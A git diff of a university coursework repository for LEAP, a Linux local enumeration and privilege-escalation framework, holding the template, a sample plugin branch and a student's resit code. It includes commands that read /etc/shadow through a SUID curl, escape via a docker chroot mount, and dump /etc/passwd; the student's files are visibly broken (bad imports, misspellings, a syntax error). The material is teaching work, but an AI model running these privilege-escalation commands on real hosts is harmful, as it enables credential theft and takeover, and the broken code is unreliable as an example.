diff --git a/src/LEAP-master/Makefile b/src/LEAP-master/Makefile new file mode 100644 index 00000000..ab204af1 --- /dev/null +++ b/src/LEAP-master/Makefile @@ -0,0 +1,43 @@ +VENV=LEAP_venv +INVENV = $(shell pip3 -V | grep $(VENV)) + +BLACK := $(shell tput -Txterm setaf 0) +RED := $(shell tput -Txterm setaf 1) +GREEN := $(shell tput -Txterm setaf 2) +YELLOW := $(shell tput -Txterm setaf 3) +LIGHTPURPLE := $(shell tput -Txterm setaf 4) +PURPLE := $(shell tput -Txterm setaf 5) +BLUE := $(shell tput -Txterm setaf 6) +WHITE := $(shell tput -Txterm setaf 7) +RESET := $(shell tput -Txterm sgr0) + +all: FORCE + @echo "\n${GREEN}This is fairly general Makefile that does the same job as the makefiles in previous projects. You can add new things, modify it, or just delete it if you don't need it.${RESET}\n" + +venvcheck: +ifeq ($(INVENV),) + $(error ${RED}You should only run this from within the venv. Use '${YELLOW}. ./$(VENV)/bin/activate${RED}'${RESET}) +else + @echo "${GREEN}venv check passed${RESET}\n" +endif + + +test: FORCE message venvcheck + py.test -v tests/ + +docs: FORCE message venvcheck + pdoc --html ./src/*.py --force + + +message: FORCE + @echo "\n${RED}If you don't have pytest or pdoc3 installed, you will need to install them globally or inside a virtualenv. This Makefile can build the venv for you, if you use '${YELLOW}make venv${RED}' followed by '${YELLOW}. ./${VENV}/bin/activate${RED}' and finally '${YELLOW}make prereqs${RED}'${RESET}\n" + + +venv: FORCE + python3 -m venv $(VENV) + +prereqs: FORCE venvcheck + pip install -r requirements.txt + + +FORCE: diff --git a/src/LEAP-master/README.md b/src/LEAP-master/README.md new file mode 100644 index 00000000..d548d716 --- /dev/null +++ b/src/LEAP-master/README.md @@ -0,0 +1,142 @@ +# LEAP + +LEAP: Local Enumeration And Privesc. Framework for 4061CEM project. + + +## What is here? + +Not much. + +This project requires you to generate most of the actual code +yourselves. To start with, each team should work on a fork of this +repository together to define the common features of the individual +pieces of functionality - we'll refer to them as "plugins". This is a +kind of **design by contract**, which you can read about here: +. Some +things to decide might be: + - Will each piece of functionality be in a separate file or subdirectory? + - Will your team have a naming convention? For example, maybe all + windows enumerators will begin with "wEnum_", linux with "lEnum_" + and so on. + - What will each function return or display? Will each function + print out to the user? Or will it return a block of text in a + string? Or a list of lines? Or maybe a dict with some meta-info + (version, plugin name, plugin author, date, time, etc.) and text + data? Or JSON? All are possibilities. + - Will you have a standard set of parameters to be passed in? Or can + each plugin have a different set of required parameters? + - What plugins will be implemented? Who will be the author? + +You should document these decisions here in the `README.md` file. Once +you are all happy with this, stage, commit and push it to your shared +fork. Then, each team member can begin writing their own tool by +creating an individual fork or using branching. Naming your tool +something sensible and uniquely identifiable at this point will be +very helpful. If you all keep the simple name "LEAP", you will might +it tricky to remember which repository you are working on later. You +can call your own fork whatever you like. + +When the individual tools are working and each team member has their +own plugins working, it is their responsibility to liaise with the +other members of the team to import the other plugins. Each team +member should create a fork of the repositories of each of their +team-mates, integrate their plugins and submit a pull-request for each +fork. If using branches, then each team member can merge into their +branch from either the master (if any system changes are made) or from +other users' forks (to incorporate their plugins). + +If using forks, with team members being A, B, C and D, they will have +one fork to start with in which the team collaborates on defining the +basics. Then A will create a personal fork of the shared repository +and work on their tool and plugins. When they're done, they will +create forks from their team-mate's repositories. Let's call them +LEAP-B, LEAP-C and LEAP-D. A will then port their plugins to each of +these new forks and submit pull requests for them to be merged into +the repositories of their teammates. + +## Why? + +This might seem overly complex, but it's not. In reality, this is one +of the common ways people collaborate using git. You can fork any +public project and work on your own copy without needing to ask +permission or get added to the original repo, then if you want to +recommend your changes to the original author you create a pull +request and they can decide to merge it into their work or not. + +In this project you will be getting experience of working on a project +and receiving multiple pull-requests from contributors and at the same +time, contributing to the repositories of others. + + + + +# Your Submission + +Key points for submission: + + - You should submit your work through Aula as a PDF. + - We will be marking anonymously, so try not to identify yourself in + the report. Use a pseudonym or redact any code or screenshots that + includes your name. + - In the information on the repository, provide a screenshot of the + sequence of commits as well as a link to your final commit. You can + find this information from the github.coventry.ac.uk web interface + by clicking on the "X commits" button: ![commit button](./commit.png) + - Do not use screenshots for code. You can format your code for Word + using a tool such as the + website + - And **definitely** do not take photographs of your screen in order to show code + - Make sure you include **ALL** of the source code required for your + submission in appendices. This includes the code imported from your + group members. + - But **also** make it clear which parts are **not** yours. + - The easiest method is to have a section showing **just your + code** and the full code as an appendix. + - Each person should have their own privesc and enumeration code as + well as the privescs and enumerations of their group. You should + not be developing these components as a group. + - For the basic task, **you can** share the menu code or use the one + provided, modified as required. + - For the intermediate tasks onward, you should make **your own + modifications or alternative menu code**. This means you can work + on the same base as your group, but add your own modifications + **not shared with your group** in order to achieve the later tasks. + - If your group failed to work together, you can still show you + incorporated the work of others. The **phantom member** branch of + the master LEAP repository + () can + be used as a source. Imagine this is the code of a member of your + group and use the privesc and enumeration classes that it contains + to add to your tool. You may need to make modifications, just as + you might with members of your group, if you have diverged from the + shared menu system. This is expected if you are attempting the + intermediate or advanced tasks. + +## Suggested Report Outline + +This is just a suggestion. + +1. Introduction. + - Explain the tool. What is it's purpose? +2. User documentation + - How do we run this? How do we operate it? +3. Unit Tests + - A table of the tests you created. Like last time: +4. Plugins + - What plugins did **you** create? + - What plugins did **your team members** create? +5. Repository + - A screenshot of your commits, demonstrating your sequence of + development and where you incorporated group-members' code + - A link to the repository +5. Appendix A: Your Code + - This is the code that is **yours**. If you used code from other + sources in this section, make clear which parts and where it came + from. This includes things from web-pages and the code you were + given in the master repo +6. Appendix B: All source code + - Include all source code here, including that which comes from your + team for plugins. Again, make sure to highlight the source of any + code that is not yours. You can simply say that your team + contributions are from "team members" in order to maintain + anonymity. diff --git a/src/LEAP-master/commit.png b/src/LEAP-master/commit.png new file mode 100644 index 00000000..b398a061 Binary files /dev/null and b/src/LEAP-master/commit.png differ diff --git a/src/LEAP-master/requirements.txt b/src/LEAP-master/requirements.txt new file mode 100644 index 00000000..8d98d363 --- /dev/null +++ b/src/LEAP-master/requirements.txt @@ -0,0 +1,2 @@ +pytest +pdoc3 diff --git a/src/LEAP-master/src/leap.py b/src/LEAP-master/src/leap.py new file mode 100644 index 00000000..b4c6d13c --- /dev/null +++ b/src/LEAP-master/src/leap.py @@ -0,0 +1,22 @@ +def dummyFunc(data): + """ This function is a placeholder """ + import base64 + out="" + for i in data: + v=ord(i) + v=((v&1)<<6) | (v>>1) + out+=chr(v) + return base64.b64encode(str.encode("".join(out))).decode() + +def unDummyFunc(data): + """ This function is a placeholder """ + import base64 + out="" + for i in base64.b64decode(str.encode(data)).decode("utf-8"): + v=ord(i) + v=((v&64)>>6) | ((v<<1)&127) + out+=chr(v) + return "".join(out) + +if __name__=="__main__": + print("Your code goes here") diff --git a/src/LEAP-master/tests/test_dummy.py b/src/LEAP-master/tests/test_dummy.py new file mode 100644 index 00000000..17d9548f --- /dev/null +++ b/src/LEAP-master/tests/test_dummy.py @@ -0,0 +1,11 @@ +import pytest +import sys +sys.path.append("./src/") +import leap + + +flag="MzZwcx15NHQzOnxzcnI9cjk=" + + +def test_dummy(): + assert leap.dummyFunc(leap.unDummyFunc(flag))==flag diff --git a/src/LEAP-phantom_member/Makefile b/src/LEAP-phantom_member/Makefile new file mode 100644 index 00000000..ab204af1 --- /dev/null +++ b/src/LEAP-phantom_member/Makefile @@ -0,0 +1,43 @@ +VENV=LEAP_venv +INVENV = $(shell pip3 -V | grep $(VENV)) + +BLACK := $(shell tput -Txterm setaf 0) +RED := $(shell tput -Txterm setaf 1) +GREEN := $(shell tput -Txterm setaf 2) +YELLOW := $(shell tput -Txterm setaf 3) +LIGHTPURPLE := $(shell tput -Txterm setaf 4) +PURPLE := $(shell tput -Txterm setaf 5) +BLUE := $(shell tput -Txterm setaf 6) +WHITE := $(shell tput -Txterm setaf 7) +RESET := $(shell tput -Txterm sgr0) + +all: FORCE + @echo "\n${GREEN}This is fairly general Makefile that does the same job as the makefiles in previous projects. You can add new things, modify it, or just delete it if you don't need it.${RESET}\n" + +venvcheck: +ifeq ($(INVENV),) + $(error ${RED}You should only run this from within the venv. Use '${YELLOW}. ./$(VENV)/bin/activate${RED}'${RESET}) +else + @echo "${GREEN}venv check passed${RESET}\n" +endif + + +test: FORCE message venvcheck + py.test -v tests/ + +docs: FORCE message venvcheck + pdoc --html ./src/*.py --force + + +message: FORCE + @echo "\n${RED}If you don't have pytest or pdoc3 installed, you will need to install them globally or inside a virtualenv. This Makefile can build the venv for you, if you use '${YELLOW}make venv${RED}' followed by '${YELLOW}. ./${VENV}/bin/activate${RED}' and finally '${YELLOW}make prereqs${RED}'${RESET}\n" + + +venv: FORCE + python3 -m venv $(VENV) + +prereqs: FORCE venvcheck + pip install -r requirements.txt + + +FORCE: diff --git a/src/LEAP-phantom_member/README.md b/src/LEAP-phantom_member/README.md new file mode 100644 index 00000000..70bda86c --- /dev/null +++ b/src/LEAP-phantom_member/README.md @@ -0,0 +1,72 @@ +# LEAP + +LEAP: Local Enumeration And Privesc. Framework for 4061CEM project. + + +## What is here? + +Not much. + +This project requires you to generate most of the actual code +yourselves. To start with, each team should work on a fork of this +repository together to define the common features of the individual +pieces of functionality - we'll refer to them as "plugins". This is a +kind of **design by contract**, which you can read about here: +. Some +things to decide might be: + - Will each piece of functionality be in a separate file or subdirectory? + - Will your team have a naming convention? For example, maybe all + windows enumerators will begin with "wEnum_", linux with "lEnum_" + and so on. + - What will each function return or display? Will each function + print out to the user? Or will it return a block of text in a + string? Or a list of lines? Or maybe a dict with some meta-info + (version, plugin name, plugin author, date, time, etc.) and text + data? Or JSON? All are possibilities. + - Will you have a standard set of parameters to be passed in? Or can + each plugin have a different set of required parameters? + - What plugins will be implemented? Who will be the author? + +You should document these decisions here in the `README.md` file. Once +you are all happy with this, stage, commit and push it to your shared +fork. Then, each team member can begin writing their own tool by +creating an individual fork or using branching. Naming your tool +something sensible and uniquely identifiable at this point will be +very helpful. If you all keep the simple name "LEAP", you will might +it tricky to remember which repository you are working on later. You +can call your own fork whatever you like. + +When the individual tools are working and each team member has their +own plugins working, it is their responsibility to liaise with the +other members of the team to import the other plugins. Each team +member should create a fork of the repositories of each of their +team-mates, integrate their plugins and submit a pull-request for each +fork. If using branches, then each team member can merge into their +branch from either the master (if any system changes are made) or from +other users' forks (to incorporate their plugins). + +If using forks, with team members being A, B, C and D, they will have +one fork to start with in which the team collaborates on defining the +basics. Then A will create a personal fork of the shared repository +and work on their tool and plugins. When they're done, they will +create forks from their team-mate's repositories. Let's call them +LEAP-B, LEAP-C and LEAP-D. A will then port their plugins to each of +these new forks and submit pull requests for them to be merged into +the repositories of their teammates. + +## Why? + +This might seem overly complex, but it's not. In reality, this is one +of the common ways people collaborate using git. You can fork any +public project and work on your own copy without needing to ask +permission or get added to the original repo, then if you want to +recommend your changes to the original author you create a pull +request and they can decide to merge it into their work or not. + +In this project you will be getting experience of working on a project +and receiving multiple pull-requests from contributors and at the same +time, contributing to the repositories of others. + + + + diff --git a/src/LEAP-phantom_member/requirements.txt b/src/LEAP-phantom_member/requirements.txt new file mode 100644 index 00000000..5bc5f38f --- /dev/null +++ b/src/LEAP-phantom_member/requirements.txt @@ -0,0 +1,3 @@ +pytest +pdoc3 +console-menu diff --git a/src/LEAP-phantom_member/src/js_plugins.py b/src/LEAP-phantom_member/src/js_plugins.py new file mode 100644 index 00000000..a32ef0e3 --- /dev/null +++ b/src/LEAP-phantom_member/src/js_plugins.py @@ -0,0 +1,121 @@ +""" Plugins for LEAP designed by James Shuttleworth """ + +from plugins import PrivEsc, Enumeration +import pathlib,stat + +import os, tempfile + +from subprocess import Popen, PIPE + +import pty + + +# A very basic method, but useful +def shellRun(command): + """ Put given commands into a temporary file, spawn a shell and explain how to use the command """ + + f = tempfile.NamedTemporaryFile(delete=False) + fname=f.name + f.write(command.encode()) + f.close() + os.system(f"chmod u+x {fname}") + print(f"Execute command with '{fname}'...\nCtrl-D to leave shell") + + pty.spawn("/bin/bash") + #os.system(fname) + os.unlink(fname) + + +class DumbSudoEscalation(PrivEsc): + """An example plugin that tries to use `sudo su` to get root. + + Requires being given the password for the current user and relies + on the current user having sudo privs, so while technically it + escalates proveleges, it does so only if you already have the + right credentials + + """ + def __init__(self, pw): + PrivEsc.__init__(self) + self.pw=pw + self.name="DumbSudoEscalation - not that useful" + self.author="James Shuttleworth" + self.description="Use sudo to 'hack' into the root account" + def execute(self): + print("Executing") + shellRun("sudo xterm") + print("Done") + + + + + + + + + + + +import subprocess + +def grabOutput(command): + sp=subprocess.run(command, stdout=subprocess.PIPE) + return sp.stdout.decode() + +class HostInfo(Enumeration): + def __init__(self): + Enumeration.__init__(self) + self.name="HostInfo" + self.author="Joe Bloggs" + self.description="Provides basic information about the host" + self.version="1.2-prerelease" + def execute(self): + out="" + out=out+"Hostname: "+grabOutput("hostname")+"\n" + out=out+"Current user: "+grabOutput("whoami")+"\n" + out=out+"ID info: \n" + idData=grabOutput("id") + parts=idData.split(" ") + for part in parts[:2]: + out=out+f"\t{part}\n" + out=out+"Group Info:\n" + groups=parts[2][7:].split(",") + for g in groups: + out=out+f"\t{g}\n" + return out + + + + + + + +def checkBinary(p): + """ Documentation """ + pl=pathlib.Path(p) + exists=pl.exists() + suid=False + if exists: + suid=(pl.stat().st_mode & stat.S_ISUID)!=0 + return (exists,suid) + + +class CurlEscalator(PrivEsc): + def __init__(self): + self.name="CurlEscalator" + self.author="James" + self.description="Uses a dangerous SUID bit on curl to get contents of /etc/shadow" + self.version="0.1 alpha" + def execute(self): + curlPath="/usr/bin/curl" + exists,suid=checkBinary(curlPath) + + if not exists: + print(f"{curlPath} does not exist") + return + if not suid: + print(f"Curl does not have the SUID bit set") + return + out=grabOutput([curlPath, "file:///etc/shadow"]) + print(out) + diff --git a/src/LEAP-phantom_member/src/leap.py b/src/LEAP-phantom_member/src/leap.py new file mode 100644 index 00000000..999e422e --- /dev/null +++ b/src/LEAP-phantom_member/src/leap.py @@ -0,0 +1,124 @@ + #!/usr/bin/env python3 +# Importing the main files into the LEAP code, so mainly plugin files +from st_plugin import * +from tp_plugins.tp_plugins import * +from ai_plugins.ai_plugins import * +from nw_plugins.nw_plugins import * +from plugins import * +from consolemenu import * +from consolemenu.items import * +import platform +#Import platform allows the system to determine what OS you are running currently +#Console-menu is what I have used to run the LEAP project + +#Menu is created with the titles placed and the group i am in +menu = ConsoleMenu("LEAP Project", "Group 12") +#The part where the OS is determined when running the OS enum/privilege escalations +funct = platform.system() + +#The if loop for different OS, 6 for Linux and 2 for Darwin (Mac OS) +#9 Enumerations for Linux and 6 Privilege Escalations + +#Checks to see if you are in Linux OS +if funct=="Linux": +#If enum1 is picked, the LinPasswdEnum will be executed + enum1 = FunctionItem("Password Enumeration", LinPasswdEnum) +#If enum2 is picked, the LinDarKernelEnum will be executed + enum2 = FunctionItem("Linux Kernel Enumeration", LinDarKernelEnum) +#If enum3 is picked, the LinLongListEnum will be executed + enum3 = FunctionItem("Listed Directories Enumeration", LinLongListEnum) +#If enum4 is picked, the LinCurrentUserEnum will be executed + enum4 = FunctionItem("User Enumeration", LinCurrentUserEnum) +#If enum5 is picked, the LinCurrentPathEnum will be executed + enum5 = FunctionItem("Current Path Enumeration", LinCurrentPathEnum) +#If enum7 is picked, the Linissue_enum from tp_plugins.py will be executed + enum7 = FunctionItem("Issue Enumeration", Linissue_Enum) +#If enum8 is picked, the LinBinaryEnum from ai_plugins.py will be executed + enum8 = FunctionItem("Binary Enumeration", LinBinaryEnum) +#If enum9 is picked, the Enum5 from nw_plugins.py will be executed + enum9 = FunctionItem("Installed Apps Enumeration", Enum5) +#If privesc1 is picked, the LinScanningSudoPrivEsc will be executed + privesc1 = FunctionItem("Scanning sudo Privilege Escalation", LinScanningSudoPrivEsc) +#If privesc2 is picked, the LinAshPrivEsc will be executed + privesc2 = FunctionItem("Ash Privilege Escalation", LinAshPrivEsc) +#If privesc3 is picked, the LinDashPrivEsc will be executed + privesc3 = FunctionItem("Dash Privilege Escalation", LinDashPrivEsc) +#If privesc4 is picked, the LinAptGetPrivEsc from ai_plugins.py will be executed + privesc4 = FunctionItem("Apt Get Privilege Escalation", LinAptGetPrivEsc) +#If privesc5 is picked, the Linionice_Priv from tp_plugins.py will be executed + privesc5 = FunctionItem("Ionice Privilege Escalation", Linionice_Priv) +#If privesc6 is picked, the PrivE3 from nw_plugins.py will be executed + privesc6 = FunctionItem("SUDO Exploit Privilege Escalation", PrivE3) +#If privesc7 is picked, the LinBusyBoxPrivEsc will be executed + privesc7 = FunctionItem("Busybox SH Privilege Escalation", LinBusyBoxPrivEsc) +#If privesc8 is picked, the LinDockerPrivEsc will be executed + privesc8 = FunctionItem("Docker Privilege Escalation", LinDockerPrivEsc) + +#1 Enumeration and 1 Privilege Escalation for Darwin +if funct=="Darwin": +#If enum6 is picked, determining if you are running this in MAC-OS, the DarGroupsEnum will be executed + enum6 = FunctionItem("Mac OS Groups Enumeration", DarGroupsEnum) + + +#All enumerations are listed here. 9 Enumerations in total. +enum1 = FunctionItem("Password Enumeration", LinPasswdEnum) +enum2 = FunctionItem("Linux Kernel Enumeration", LinDarKernelEnum) +enum3 = FunctionItem("Listed Directories Enumeration", LinLongListEnum) +enum4 = FunctionItem("User Enumeration", LinCurrentUserEnum) +enum5 = FunctionItem("Current Path Enumeration", LinCurrentPathEnum) +enum6 = FunctionItem("Mac OS Groups Enumeration", DarGroupsEnum) +enum7 = FunctionItem("Issue Enumeration", Linissue_Enum) +enum8 = FunctionItem("Binary Enumeration", LinBinaryEnum) +enum9 = FunctionItem("Installed Apps Enumeration", Enum5) + +#All Privilege Escalations are listed here. 8 Privilege Escalations in total. +privesc1 = FunctionItem("Scanning Sudo Privilege Escalation", LinScanningSudoPrivEsc) +privesc2 = FunctionItem("Ash Privilege Escalation", LinAshPrivEsc) +privesc3 = FunctionItem("Dash Privilege Escalation", LinDashPrivEsc) +privesc4 = FunctionItem("Apt Get Privilege Escalation", LinAptGetPrivEsc) +privesc5 = FunctionItem("Ionice Privilege Escalation", Linionice_Priv) +privesc6 = FunctionItem("SUDO Exploit Privilege Escalation", PrivE3) +privesc7 = FunctionItem("Busybox SH Privilege Escalation", LinBusyBoxPrivEsc) +privesc8 = FunctionItem("Docker Privilege Escalation", LinDockerPrivEsc) + +#The Selection Menu, where 2 menu's for Enumerations and Privilege Escalations are created +#The Menu for Privilege Escalation +#Including all the Privilege Escalations, in this menu +privEscMenu = ConsoleMenu("Priv Esc", "Run one") +privEscMenu.append_item(privesc1) +privEscMenu.append_item(privesc2) +privEscMenu.append_item(privesc3) +privEscMenu.append_item(privesc4) +privEscMenu.append_item(privesc5) +privEscMenu.append_item(privesc6) +privEscMenu.append_item(privesc7) +privEscMenu.append_item(privesc8) +#Each item in the Priv Esc Menu will be appended + +#The Enumeration Menu has been created +#With each enumeration being appended to the menu +enumMenu = ConsoleMenu("Enumerations", "Pick one") +enumMenu.append_item(enum1) +enumMenu.append_item(enum2) +enumMenu.append_item(enum3) +enumMenu.append_item(enum4) +enumMenu.append_item(enum5) +enumMenu.append_item(enum6) +enumMenu.append_item(enum7) +enumMenu.append_item(enum8) +enumMenu.append_item(enum9) + +#Enumeration item for Mac OS, Enum 6 has been appended to the Enumeration Menu + + +#Enumeration Sub menu, this will let the user access this sub-menu within the main menu +submenu_item = SubmenuItem("Enumerations", enumMenu) + +#Privilege Escalation Sub menu, lets the user get into access of the sub-menu within the main menu +privEsc_submenu = SubmenuItem("Privilege Escalation", privEscMenu) + +#Appends the sub-menu's into the menu +menu.append_item(privEsc_submenu) +menu.append_item(submenu_item) +#This makes all created menus/items been seen in the user interface +menu.show() diff --git a/src/LEAP-phantom_member/src/logo.py b/src/LEAP-phantom_member/src/logo.py new file mode 100644 index 00000000..3c86b70c --- /dev/null +++ b/src/LEAP-phantom_member/src/logo.py @@ -0,0 +1,11 @@ +pgmlogo=""" ______ __ __ +| __ \ |--.---.-.-----.| |_.-----.--------. +| __/ | _ | || _| _ | | +|___| |__|__|___._|__|__||____|_____|__|__|__| + + _______ _______ __ +| __|.----.-----.--.--.-----. | | |.-----.--------.| |--.-----.----. +| | || _| _ | | | _ | | || -__| || _ | -__| _| +|_______||__| |_____|_____| __| |__|_|__||_____|__|__|__||_____|_____|__| + |__| +""" diff --git a/src/LEAP-phantom_member/src/phantom_plugins.py b/src/LEAP-phantom_member/src/phantom_plugins.py new file mode 100644 index 00000000..b2364e2f --- /dev/null +++ b/src/LEAP-phantom_member/src/phantom_plugins.py @@ -0,0 +1,61 @@ +from plugins import PrivEsc, Enumeration +import pathlib,stat +import os, tempfile +import subprocess +import calendar +from datetime import datetime + +def grabOutput(command): + sp=subprocess.run(command, stdout=subprocess.PIPE) + return sp.stdout.decode() + +def maxLen(items): + ml=0 + item=items[0] + for i in items: + if len(str(i))>ml: + ml=len(str(i)) + item=i + return item + + +class DateInfo(Enumeration): + def __init__(self): + Enumeration.__init__(self) + self.name="Date Info" + self.author="The Phantom Group Member" + self.description="Provides info on the current date. This is a placeholder for anyone that needs to top-up their 'contributed' plgins. It is designed to be complex enough to represent something real, but peculiar enough that it will not have the same functionality as any genuine submission." + self.version="2.0 You can (not) advance" + def execute(self): + out="" + sysDate=grabOutput("date") + out+=f"\nSystem date: {sysDate}\n\n" + today = datetime.today() + out+=calendar.TextCalendar().formatmonth(today.year,today.month) + return out + +class EtcInfo(Enumeration): + def __init__(self): + Enumeration.__init__(self) + self.name="/etc/ info" + self.author="The Phantom Group Member" + self.description="Provides fairly useless info about files in /etc. This is a placeholder for anyone that needs to top-up their 'contributed' plgins. It is designed to be complex enough to represent something real, but peculiar enough that it will not have the same functionality as any genuine submission." + self.version="3.1 Thrice upon a time" + def execute(self): + out="" + containsX=[] + containsQ=[] + + + for path in pathlib.Path('/etc/').rglob('*.*'): + if "X" in str(path).upper(): + containsX.append(path) + elif "Q" in str(path).upper(): + containsQ.append(path) + out+=f"\n{len(containsX)} items exist in /etc that contain the letter X\n" + out+=f"\tThe longest is {maxLen(containsX)}" + + out+=f"\n\n{len(containsQ)} items exist in /etc that contain the letter Q\n" + out+=f"\tThe longest is {maxLen(containsQ)}" + return out + diff --git a/src/LEAP-phantom_member/src/plugins.py b/src/LEAP-phantom_member/src/plugins.py new file mode 100644 index 00000000..9b8c336b --- /dev/null +++ b/src/LEAP-phantom_member/src/plugins.py @@ -0,0 +1,37 @@ +""" Template classes for plugins and useful functions """ + +import pty + + + + +## A couple of optional super classes and a general item class to represent them more abstractly +## Can be used to add common functionality to privesc/enumeration plugins + +class Item: + """A generic privelege escalation/enumeration class. Include common + functionality here""" + def __init__(self): + self.name="Not for actual use" + self.author="James Shuttleworth" + self.description="Someone needs to write this bit" + self.version=1.0 + def execute(self): + """Execute the privelege escalation/enumeration, dropping the user + into a shell or displaying collected info. + """ + print("This should be overridden in your plugin") + + def info(self): + """Return useful information on the plugin, suitable for the user to + read""" + return f"{self.name} version {self.version}, by {self.author}. {self.description}" + +class PrivEsc(Item): + def info(self): + return "PRIVESC: "+Item.info(self) + +class Enumeration(Item): + def info(self): + return "ENUMERATION: "+Item.info(self) + diff --git a/src/LEAP-phantom_member/tests/test_dummy.py b/src/LEAP-phantom_member/tests/test_dummy.py new file mode 100644 index 00000000..70aa8681 --- /dev/null +++ b/src/LEAP-phantom_member/tests/test_dummy.py @@ -0,0 +1,30 @@ +import pytest +import sys +sys.path.append("./src/") +import leap +import js_plugins +import platform +import plugins +def test_grabOutput_nothing(): + output=js_plugins.grabOutput(["which", "doesnotexist"]) + assert len(output)==0, "Which returned something other than an empty string when asked for a binary that shouldn't exist" +def test_grabOutput_something(): + output=js_plugins.grabOutput(["which", "ls"]) + assert len(output)>0 + assert "ls" in output + + +def test_hostinfo(): + h=js_plugins.HostInfo() + assert isinstance(h,plugins.Enumeration) + assert isinstance(h,plugins.Item) + inf=h.info() + assert "ENUMERATION" in inf + assert "HostInfo" in inf + assert "Bloggs" in inf + assert "Provides basic" in inf + o=h.execute() + assert o!=None + assert len(o)>0 + assert platform.node() in o + diff --git a/src/leap.py b/src/leap.py index b4c6d13c..b9b269a1 100644 --- a/src/leap.py +++ b/src/leap.py @@ -1,22 +1,71 @@ -def dummyFunc(data): - """ This function is a placeholder """ - import base64 - out="" - for i in data: - v=ord(i) - v=((v&1)<<6) | (v>>1) - out+=chr(v) - return base64.b64encode(str.encode("".join(out))).decode() - -def unDummyFunc(data): - """ This function is a placeholder """ - import base64 - out="" - for i in base64.b64decode(str.encode(data)).decode("utf-8"): - v=ord(i) - v=((v&64)>>6) | ((v<<1)&127) - out+=chr(v) - return "".join(out) - -if __name__=="__main__": - print("Your code goes here") + #!/usr/bin/env python3 +# Importing the main files into the LEAP code, so mainly plugin files +from ms_plugin.py import * +from phantom_plugins.py import * +from plugins import * +from consolemenu import * +from consolemenu.items import * +import platform + +#Import platform allows the system to determine what OS you are running currently +#Console-menu is what I have used to run the LEAP project + +#Menu is created with the titles placed and the group i am in +menu = ConsoleMenu("Leap resit", "Suffy and Phantom's group") +#The part where the OS is determined when running the OS enum/privilege escalations +function = platform.system() + +#The if loop for different OS, 6 for Linux and 2 for Darwin (Mac OS) +#9 Enumerations for Linux and 6 Privilege Escalations + +#Checks to see if you are in Linux OS +if function=="LinOS": +#If enum1 is picked, the LinPasswdEnum will be executed + firstenum = FunctionItem("Credentials Enumeration", LinCredEnum) +#If enum2 is picked, the LinDarKernelEnum will be executed + secondenum = FunctionItem("Linux Version Enum", LinVersionsEnum) + + thirdenum = FuntionItem("/etc/ info", EtcInfo) +#If privesc8 is picked, the LinDockerPrivEsc will be executed + firstPrivEsc = FunctionItem("LinDSUIDPrivEsc", LinDSUIDPrivEsc) + + + + +#All enumerations are listed here. 2 Enumerations in total. +firstenum = FunctionItem("Credentials Enumeration", LinCredEnum) +secondenum = FunctionItem("Linux Version Enum", LinVersionsEnum) +thirdenum = FuntionItem("/etc/ info", EtcInfo) + +#All Privilege Escalations are listed here. 1 Privilege Escalation in total. +firstPrivEsc = FunctionItem("LinDSUIDPrivEsc", LinDSUIDPrivEsc) + +#The Selection Menu, where 2 menu's for Enumerations and Privilege Escalations are created +#The Menu for Privilege Escalation +#Including all the Privilege Escalations, in this menu +PEMenu= ConsoleMenu("Privilege Escalation", "Execute One") +PEMenu.append_item(firstPrivEsc) +#Each item in the Priv Esc Menu will be appended + +#The Enumeration Menu has been created +#With each enumeration being appended to the menu +Enumenu = ConsoleMenu("Enumerations", "Pick one") +Enumenu.append_item(firstenum) +Enumenu.append_item(secondenum) +Enumenu.append_item(thirdenum) + + +#Enumeration item for Mac OS, Enum 6 has been appended to the Enumeration Menu + + +#Enumeration Sub menu, this will let the user access this sub-menu within the main menu +submenu_item = SubmenuItem("Enumerations", EnuMenu) + +#Privilege Escalation Sub menu, lets the user get into access of the sub-menu within the main menu +privEsc_submenu = SubmenuItem("Privilege Escalation", PEMenu) + +#Appends the sub-menu's into the menu +menu.append_item(privEsc_submenu) +menu.append_item(submenu_item) +#This makes all created menus/items been seen in the user interface +menu.show() diff --git a/src/ms_plugin.py b/src/ms_plugin.py new file mode 100644 index 00000000..1c50b7d5 --- /dev/null +++ b/src/ms_plugin.py @@ -0,0 +1,27 @@ +#!/usr/bin/env python3 +from plugins import PrivEsc, Enumeration +from consolemenu import Screen + +def LinCredEnum(): + Screen().input('Press [Space] to proceed') + s=Enumeration("Credentials Enumeration", "Muhmmad", Displays the Password file", 'cat/etc/passwd') + print(s.info()) + Screen().input('Press [Space] to proceed') + s.execute() + Screen().input('\nPress [Space] to proceed') + +def LinVersionEnum(): + Screen().input('Press [Space] to proceed') + s=Enumeration("Linux Version Enum", "Python3", "Display the version of the software", 'uname-r') + print(s.info()) + Screen().input('Press [Space] to proceed') + s.execute() + Screen().input('\nPress [Space] to proceed') + +def LinDSUIDPrivEsc(): + Screen().input('Press [Space] to proceed') + s=PrivEsc("DSUID Priv Esc", "Linux", "DSUID", 'docker run-v /:/mnt --rm -it alphine chroot /mnt') + print(s.info()) + Screen().input('Press [Space] to proceed') + s.execute() + Screen().input('\nPress [Space] to proceed') \ No newline at end of file